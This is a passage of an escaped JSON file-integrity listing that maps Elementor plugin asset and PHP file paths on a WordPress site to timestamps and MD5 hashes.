8471,\"h\":\"914a88d61b2ce7d8b060a3416e209de7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/swiper\\/swiper.jquery.js\":{\"d\":1545638471,\"h\":\"b80cc950f422cfae905a0b0b9f902d1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/swiper\\/swiper.jquery.min.js\":{\"d\":1545638471,\"h\":\"00e93736ce410d9a36fb7d376a6524c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/dialog\\/dialog.js\":{\"d\":1545638471,\"h\":\"1cf68e1cbf83a28dfe5642b0a7889232\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/dialog\\/dialog.min.js\":{\"d\":1545638471,\"h\":\"f1a18890f21832683186001c666828f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/css\\/font-awesome.css\":{\"d\":1545638471,\"h\":\"c495654869785bc3df60216616814ad1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/css\\/font-awesome.min.css\":{\"d\":1545638471,\"h\":\"269550530cc127b6aa5a35925a7de6ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1545638471,\"h\":\"fee66e712a8a08eef5805a46892932ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/fonts\\/fontawesome-webfont.eot\":{\"d\":1545638471,\"h\":\"674f50d287a8c48dc19ba404d20fe713\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/fonts\\/fontawesome-webfont.ttf\":{\"d\":1545638471,\"h\":\"b06871f281fee6b241d60582ae9369b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/fonts\\/FontAwesome.otf\":{\"d\":1545638471,\"h\":\"0d2717cd5d853e5c765ca032dfd41a4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/font-awesome\\/fonts\\/fontawesome-webfont.woff2\":{\"d\":1545638471,\"h\":\"af7ae505a9eed503f8b8e6982036873e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/inline-editor\\/js\\/inline-editor.min.js\":{\"d\":1545638471,\"h\":\"ee769a51941e44a254668870635dab7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/inline-editor\\/js\\/inline-editor.js\":{\"d\":1545638471,\"h\":\"9b3dc3f12a00b9509ce2200010028397\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-numerator\\/jquery-numerator.js\":{\"d\":1545638471,\"h\":\"20ef7607fbbf65f7375cca9bd7a03d81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-numerator\\/jquery-numerator.min.js\":{\"d\":1545638471,\"h\":\"4d43b2fcb5ef3e6afdcd539f46148514\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/nprogress\\/nprogress.min.js\":{\"d\":1545638471,\"h\":\"ef01076fb79e338f9d9514bcd0f60683\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/nprogress\\/nprogress.js\":{\"d\":1545638471,\"h\":\"5fc208df77427b19a1558ee3c2e2d344\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/imagesloaded\\/imagesloaded.js\":{\"d\":1545638471,\"h\":\"eff51c9330e4cc76361f95d230484ce7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/imagesloaded\\/imagesloaded.min.js\":{\"d\":1545638471,\"h\":\"18c83ba6dae51cfec87c46d2520f3bda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-hover-intent\\/jquery-hover-intent.js\":{\"d\":1545638471,\"h\":\"d1463860a23f95fa791a5857a6e27b81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-hover-intent\\/jquery-hover-intent.min.js\":{\"d\":1545638471,\"h\":\"235a6659ca7b430ccdbcbc412ddc50e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/css\\/elementor-icons.min.css\":{\"d\":1545638471,\"h\":\"53b805a968e14a23eb918a3c9dab483a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/css\\/elementor-icons.css\":{\"d\":1545638471,\"h\":\"4c31b80e63436d862986bf1ae0ee6a09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/fonts\\/eicons.ttf\":{\"d\":1545638471,\"h\":\"6a9fb84114e990fb0e4e8e8a91fa81a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/fonts\\/eicons.woff2\":{\"d\":1545638471,\"h\":\"2d7a93baae58f4d7b1a4aad7afd2f562\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/fonts\\/eicons.woff\":{\"d\":1545638471,\"h\":\"78d2bc246db64cec4799e5a0d076a803\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/eicons\\/fonts\\/eicons.eot\":{\"d\":1545638471,\"h\":\"474f7dc00a31f08919245c0e6f728978\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/tipsy\\/tipsy.js\":{\"d\":1545638473,\"h\":\"8e2659d4eb0160eafcb59d0b57c5aac5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/tipsy\\/tipsy.min.js\":{\"d\":1545638473,\"h\":\"f030b39e0213552a45e9f03822126840\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/flatpickr\\/flatpickr.min.css\":{\"d\":1545638473,\"h\":\"1f2d2303bc2c3905b9b891e45b3db53c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/flatpickr\\/flatpickr.js\":{\"d\":1545638473,\"h\":\"a865a6c8b98c13bd8b6893adad8b5560\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/flatpickr\\/flatpickr.min.js\":{\"d\":1545638473,\"h\":\"7e29c23288383e613d4275ec9f6f9d38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/flatpickr\\/flatpickr.css\":{\"d\":1545638473,\"h\":\"0391da9be8b8aa2f1024701d74a5cd2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/e-select2\\/css\\/e-select2.css\":{\"d\":1545638473,\"h\":\"58d2e32090dc843a2cc2089fc8a96365\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/e-select2\\/css\\/e-select2.min.css\":{\"d\":1545638473,\"h\":\"d44571114a90b9226cd654d3c7d9442c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/e-select2\\/js\\/e-select2.full.min.js\":{\"d\":1545638473,\"h\":\"cd83e6397880b809d3a79e8065b8e5ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/e-select2\\/js\\/e-select2.full.js\":{\"d\":1545638473,\"h\":\"ce3888b69f02b3c7effe00a44c7ba784\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/waypoints\\/waypoints.js\":{\"d\":1545638473,\"h\":\"0f8ecd80321cdfe9e64a4ab42f56ebdf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/waypoints\\/waypoints-for-editor.js\":{\"d\":1545638473,\"h\":\"e4dc0631a2a87481506ffba814ca44b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/waypoints\\/waypoints.min.js\":{\"d\":1545638473,\"h\":\"3819c3569da71daec283a75483735f7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/wp-color-picker\\/wp-color-picker-alpha.js\":{\"d\":1545638473,\"h\":\"6955aae84195273fac88f278b3652df1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/wp-color-picker\\/wp-color-picker-alpha.min.js\":{\"d\":1545638473,\"h\":\"7b5cc8c1bd4bbfe461272619cadd76ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-easing\\/jquery-easing.min.js\":{\"d\":1545638473,\"h\":\"8da44cc53aae121564ebe6bf7cad2208\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/jquery-easing\\/jquery-easing.js\":{\"d\":1545638473,\"h\":\"14918ed4e565a3da89e09ab742c53d8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/templates\\/frontend.min.css\":{\"d\":1545638473,\"h\":\"776fdcb59d01211cee7c7cb986fdf8cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/templates\\/frontend-rtl.min.css\":{\"d\":1545638473,\"h\":\"2011ab02e8053214e7fb9706c2a49c62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/templates\\/frontend.css\":{\"d\":1545638473,\"h\":\"0205080c7ef6afaac195dde58e9802f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/templates\\/frontend-rtl.css\":{\"d\":1545638473,\"h\":\"3e37883fa1f23edfa3d4b46ef7bfcbb5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend-msie.min.css\":{\"d\":1545638473,\"h\":\"e148a8f84d472f48b8d6f286846cde27\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-rtl.css\":{\"d\":1545638473,\"h\":\"e3afe0910e98e53ef4afed0c0f74b955\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/common-rtl.min.css\":{\"d\":1545638473,\"h\":\"c1de1354139ec6d2d3465b8a14ef3010\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/admin.min.css\":{\"d\":1545638473,\"h\":\"f7abee13029219c1569f87454040e437\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend.min.css\":{\"d\":1545638473,\"h\":\"8fdd551df9f9c3e82e381362818f8e17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/common.min.css\":{\"d\":1545638473,\"h\":\"2bbee646385d2de14f0b2e1264239df9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend-rtl.min.css\":{\"d\":1545638473,\"h\":\"fcef551bd32538c176e5f9781272dc7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/common-rtl.css\":{\"d\":1545638473,\"h\":\"fef098f64587deb4b0ebfe64cc19e8a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-rtl.min.css\":{\"d\":1545638473,\"h\":\"f0c4c7b203bda484b8ceb6ee421c29b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-preview.min.css\":{\"d\":1545638473,\"h\":\"7d7d4138f9a14e598f4487803058f69b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-preview-rtl.css\":{\"d\":1545638473,\"h\":\"4ea519f6a10d9d119b0a0908c73c55f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor.css\":{\"d\":1545638473,\"h\":\"8130bd9689a79a66744b4b52271a7a45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend.css\":{\"d\":1545638473,\"h\":\"160cb6ce41b4c1272f5503724a56c898\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/common.css\":{\"d\":1545638473,\"h\":\"943961a9f01ec476122148fc968b3881\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-preview-rtl.min.css\":{\"d\":1545638473,\"h\":\"b378ae6ba69f526452b7e4839ef3e40b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor-preview.css\":{\"d\":1545638473,\"h\":\"18ba7e9037f4e7dc3197094d633cbd14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend-rtl.css\":{\"d\":1545638473,\"h\":\"c849e43ccbd7ebd7945a008620931299\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/editor.min.css\":{\"d\":1545638473,\"h\":\"80242580aec0ce511eea411069fbdb46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/admin-rtl.css\":{\"d\":1545638473,\"h\":\"855d485590d56424a2e334b2a8162711\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/admin-rtl.min.css\":{\"d\":1545638473,\"h\":\"b4e66334788e969d5a2270d8cfa1faea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/admin.css\":{\"d\":1545638473,\"h\":\"8adb89b07d463b40b290c7961e782f21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/css\\/frontend-msie.css\":{\"d\":1545638473,\"h\":\"6a7bf46b53e83bda18a255bb5aee10bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/common.js\":{\"d\":1545638473,\"h\":\"80287ed55bc59539ced3cbc4ff26d227\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/admin-feedback.js\":{\"d\":1545638473,\"h\":\"16e7054abf9078ea9a4fd33033d0b8cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/frontend.min.js\":{\"d\":1545638473,\"h\":\"790cf6527064994e79956fcdaa684adb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/admin-feedback.min.js\":{\"d\":1545638473,\"h\":\"9bd120bca90f26c059241922e02dcf4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/gutenberg.min.js\":{\"d\":1545638473,\"h\":\"7611ad2a333c824a578f31fa55d31c77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/gutenberg.js\":{\"d\":1545638473,\"h\":\"7d6da7f7bceaf79c66d7a6596fbe38f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/new-template.js\":{\"d\":1545638473,\"h\":\"31c8692e9e4012dd5617b29f6a0677e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/editor.min.js\":{\"d\":1545638473,\"h\":\"f7aa1579d56cd8c2c3f1d57ba3533d37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/admin.js\":{\"d\":1545638473,\"h\":\"729b03174980a6f81cf0f789215af01c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/common.min.js\":{\"d\":1545638473,\"h\":\"d773bab25249f4abcc3e9ef4fb627d97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/frontend.js\":{\"d\":1545638473,\"h\":\"9a7456132ad671a305ebd736e4f7bc64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/editor.js\":{\"d\":1545638473,\"h\":\"e9a8a0be745058673d8b635d610a9869\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/admin.min.js\":{\"d\":1545638473,\"h\":\"8923c208a2f52d8e7a3618d255621ed9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/js\\/new-template.min.js\":{\"d\":1545638473,\"h\":\"8f77606a186c1691eae37f755b62c706\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/schemes.php\":{\"d\":1545638473,\"h\":\"7166ea05536b35d8b5dff7564f23ed66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/widgets.php\":{\"d\":1545638473,\"h\":\"580aa3796f2aa44f5d88ed88a475c926\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/wordpress-widgets.php\":{\"d\":1545638473,\"h\":\"d763909741f4efcc2f7face45bb60ee8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/skins.php\":{\"d\":1545638473,\"h\":\"a438ddfb26e56b1ee823e48389828760\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/controls.php\":{\"d\":1545638473,\"h\":\"98be6505d4278e72aecd1fc68d271b95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/elements.php\":{\"d\":1545638473,\"h\":\"e95313b7d740e9e38a346bf2f22e0ab8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/managers\\/image.php\":{\"d\":1545638473,\"h\":\"5249d9de3b0d45d51de52c106be971a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/typography.php\":{\"d\":1545638473,\"h\":\"8a8d4003aff06698dcc376e5698fd697\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/box-shadow.php\":{\"d\":1545638473,\"h\":\"23bf9f7faef0736c065a7a6aa9c6d1a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/background.php\":{\"d\":1545638473,\"h\":\"81a19ef7c920eede63f3bc2f44c15176\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/border.php\":{\"d\":1545638473,\"h\":\"1e2df560eccf8c3de02c4ec634b1176c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/image-size.php\":{\"d\":1545638473,\"h\":\"bfd0c05ebf4be9e97b8594f7291a5ab4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/text-shadow.php\":{\"d\":1545638473,\"h\":\"fa336b36b739ec17909bd05c4100618f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/css-filter.php\":{\"d\":1545638473,\"h\":\"17649aac8e0c95229b34bfdcbff407c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/groups\\/base.php\":{\"d\":1545638473,\"h\":\"02b58e89e640bf1719cc25504c701718\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/repeater.php\":{\"d\":1545638473,\"h\":\"fa596c9c69b5e7bcdeaafce46e5eacec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/divider.php\":{\"d\":1545638473,\"h\":\"c8981dc492d96623a5ea2eefab649804\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/base-units.php\":{\"d\":1545638473,\"h\":\"11b56b0c3351d55b19b43e2035b93470\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/textarea.php\":{\"d\":1545638473,\"h\":\"cbbb68e2fe06ad6cfec7d16d4195c8e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/box-shadow.php\":{\"d\":1545638473,\"h\":\"4d6d4b92cdf1ccde5bf1b83a38a2c5ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/gallery.php\":{\"d\":1545638473,\"h\":\"47940f53844d91e40700bca72e785d7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/date-time.php\":{\"d\":1545638473,\"h\":\"3d1384d3641335a97d2214fb76bc483a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/icon.php\":{\"d\":1545638473,\"h\":\"0cc1b4071d6c2f5bf5a76a02db9f82e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/image-dimensions.php\":{\"d\":1545638473,\"h\":\"4d4b9f7cfcf2687097c28a8f62a51bfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/text.php\":{\"d\":1545638473,\"h\":\"2d77ffff5ebdb30fa5ad9097699cfe78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/wysiwyg.php\":{\"d\":1545638473,\"h\":\"72adb68c6e2a66dfd5b97a0d68d1be78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/popover-toggle.php\":{\"d\":1545638473,\"h\":\"666e28477a98739c4b0dc4612bb45abb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/heading.php\":{\"d\":1545638473,\"h\":\"50a8fac88e9e16bf3760a4b837c9b61f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/choose.php\":{\"d\":1545638473,\"h\":\"ec2744230fbd6bd010341a9b4cacfdfb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/section.php\":{\"d\":1545638473,\"h\":\"b49d1fe77dbc3b038aa60795566a2f3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/order.php\":{\"d\":1545638473,\"h\":\"6dfaf2b9469726703179268c995271e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/dimensions.php\":{\"d\":1545638473,\"h\":\"f17bddd91d3cfa8eb22a856819c25389\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/url.php\":{\"d\":1545638473,\"h\":\"11690c4af1adeb55cec0b8242bba1fee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/slider.php\":{\"d\":1545638473,\"h\":\"cca98b5fefb421d58a8daa1ed0028b71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/hover-animation.php\":{\"d\":1545638473,\"h\":\"b67174bc9e6e946d74a452a8e6be8599\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/base-multiple.php\":{\"d\":1545638473,\"h\":\"7e8d661e07646455ab1ef1f8ab7d451d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/animation.php\":{\"d\":1545638473,\"h\":\"a7b228faa578d0f8ccfc8e824f629bc7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/select.php\":{\"d\":1545638473,\"h\":\"b64710db1f193c23771edc24d7a9cfa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/switcher.php\":{\"d\":1545638473,\"h\":\"3afa4b1419cf11f4ec94cb2a6d421b93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/tabs.php\":{\"d\":1545638473,\"h\":\"602a77cd027189989d61310790f70101\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/font.php\":{\"d\":1545638473,\"h\":\"abd2b338a36a25736e0ef19593353c2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/structure.php\":{\"d\":1545638473,\"h\":\"72a85704a25ad7c54ae2896bfe9ed1b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/wp-widget.php\":{\"d\":1545638473,\"h\":\"6a6059b04a82a433b2d219510152af14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/color.php\":{\"d\":1545638473,\"h\":\"b85587018e6d70e4631c391a0f51564c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp